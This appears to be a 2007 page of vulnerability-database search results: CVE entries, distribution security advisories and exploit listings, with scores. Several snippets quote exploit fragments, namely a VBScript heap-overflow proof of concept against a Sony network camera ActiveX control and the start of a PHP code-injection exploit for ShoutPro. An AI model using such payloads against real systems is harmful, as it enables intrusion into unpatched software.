
4404 matches found

CVE
added 2007/06/30 1:0 a.m. | 84 views

CVE-2007-3503

The CVE-2007-3503 issue affects Sun JDK 6 and JDK 5.0 Update 11 where the Javadoc tool can generate HTML documentation pages containing cross-site scripting (XSS). A remote attacker could inject arbitrary web script or HTML via unspecified vectors. Supported documents note this as part of broader...

CVSS 4.3 | AI score 5.3 | EPSS 0.03051
Exploits: 1 | References: 24 | Affected Software: 1

Packet Storm
added 2007/06/28 12:0 a.m. | 31 views

sony-heap.txt

Sub tryMe buff = String15000, "A" viewer.PrmSetNetworkParam buff, 1 End Sub...

AI score 7.4
Exploits: 0

seebug.org
added 2007/06/28 12:0 a.m. | 33 views

Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC

No description provided by source. !-- Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC Camera info http://bssc.sel.sony.com/BroadcastandBusiness/DisplayModel?id=79540 SNC-P5 External API documentation...

AI score 7.1
Exploits: 0

exploitpack
added 2007/06/27 12:0 a.m. | 13 views

Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)

Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC Sub tryMe buff = String15000, "A" viewer.PrmSetNetworkParam buff, 1 End Sub milw0rm.com 2007-06-27...

AI score 0.5
Exploits: 0

Exploit DB
added 2007/06/27 12:0 a.m. | 72 views

Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)

Sub tryMe buff = String15000, "A" viewer.PrmSetNetworkParam buff, 1 End Sub milw0rm.com 2007-06-27...

AI score 7
Exploits: 0

Fedora
added 2007/05/31 6:8 p.m. | 32 views

[SECURITY] Fedora 7 Update: yelp-2.18.1-4.fc7

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

CVSS 9.3 | AI score 1.6 | EPSS 0.13847
Exploits: 0

Fedora
added 2007/05/31 1:7 p.m. | 29 views

[SECURITY] Fedora Core 5 Update: yelp-2.14.3-5.fc5

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

CVSS 9.3 | AI score 1.7 | EPSS 0.13847
Exploits: 1

Fedora
added 2007/05/31 1:1 p.m. | 30 views

[SECURITY] Fedora Core 6 Update: yelp-2.16.0-13.fc6

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

CVSS 9.3 | AI score 1.7 | EPSS 0.13847
Exploits: 0

securityvulns
added 2007/05/19 12:0 a.m. | 98 views

[CVE-2007-1355] Tomcat documentation XSS vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-1355: Tomcat documentation XSS vulnerabilities Severity: Moderate Cross-site scripting Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.23 Tomcat...

CVSS 4.3 | AI score 0.5 | EPSS 0.58246
Exploits: 2

exploitpack
added 2007/05/19 12:0 a.m. | 13 views

Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities

Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/24058/info Apache Tomcat's documentation web application includes a sample application that is prone to multiple cross-site scripting vulnerabilities...

AI score 7
Exploits: 0

Gentoo Linux
added 2007/05/10 12:0 a.m. | 24 views

PostgreSQL: Privilege escalation

Background PostgreSQL is an open source object-relational database management system. Description An error involving insecure searchpath settings in the SECURITY DEFINER functions has been reported in PostgreSQL. Impact If allowed to call a SECURITY DEFINER function, an attacker could gain the SQ...

CVSS 6 | AI score 8.9 | EPSS 0.03184
Exploits: 0

0day.today
added 2007/04/17 12:0 a.m. | 32 views

ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit

Exploit for unknown platform in category web applications =========================================================== ShoutPro ?php echo "...

AI score 7.1
Exploits: 0

Exploit DB
added 2007/04/17 12:0 a.m. | 117 views

ShoutPro 1.5.2 - 'shout.php' Remote Code Injection

?php echo "\n"; echo " Special Greetings To - Timq,Warpboy,The-Maggot \n"; echo "\n\n\n"; //Writes Files - Under 100 bytes to meet requirements $temppayload = "%3C%3F%24a%3D...

AI score 7.4
Exploits: 0

securityvulns
added 2007/04/06 12:0 a.m. | 93 views

ACLS ineffective in SQL-Ledger and LedgerSMB

Hi all; I have decided to finally send to this list a serious security flaw in the design of SQL-Ledger all versions. LedgerSMB all versions is also affected but the problem with a workaround has been mentioned in our documentation since the fork. Ordinarily I would not make a big deal out of thi...

AI score 7.1
Exploits: 0

securityvulns
added 2007/04/04 12:0 a.m. | 58 views

Nine Vista CVEs, including Microsoft inaccurate Teredo use case documentation

Hello all, In my blog today 1 I give a brief run-down of nine CVE entries that were recently published for Vista; the CVEs are numbered CVE-2007-1527 through CVE-2007-1535. At this point, I do not know who requested the entries be created. However, the entries are based on items reported in...

CVSS 7.5 | AI score 5.9 | EPSS 0.11793
Exploits: 0

Cvelist
added 2007/03/20 8:0 p.m. | 21 views

CVE-2007-1535

Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo...

AI score 6.6 | EPSS 0.11793
Exploits: 0 | References: 6

Fedora
added 2007/02/26 10:10 p.m. | 18 views

[SECURITY] Fedora Core 5 Update: yelp-2.14.3-4.fc5

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

AI score 1.7
Exploits: 0

Fedora
added 2007/02/05 5:8 p.m. | 33 views

[SECURITY] Fedora Core 6 Update: postgresql-8.1.7-1.fc6

PostgreSQL is an advanced Object-Relational database management system DBMS that supports almost all SQL constructs including transactions, subselects and user-defined types and functions. The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DB...

CVSS 8.5 | AI score 0.9 | EPSS 0.04693
Exploits: 0

Prion
added 2007/02/04 12:28 a.m. | 17 views

Remote file inclusion

PHP remote file inclusion vulnerability in install.php in Somery 0.4.6 allows remote attackers to execute arbitrary PHP code via a URL in the skindir parameter, a different vector than CVE-2006-4669. NOTE: the documentation says to remove install.php after installation...

CVSS 7.5 | AI score 7.8 | EPSS 0.02971
Exploits: 1 | References: 3 | Affected Software: 1

NVD
added 2007/02/04 12:28 a.m. | 16 views

CVE-2007-0704

PHP remote file inclusion vulnerability in install.php in Somery 0.4.6 allows remote attackers to execute arbitrary PHP code via a URL in the skindir parameter, a different vector than CVE-2006-4669. NOTE: the documentation says to remove install.php after installation...

CVSS 7.5 | AI score 7.4 | EPSS 0.02568
Exploits: 1 | References: 3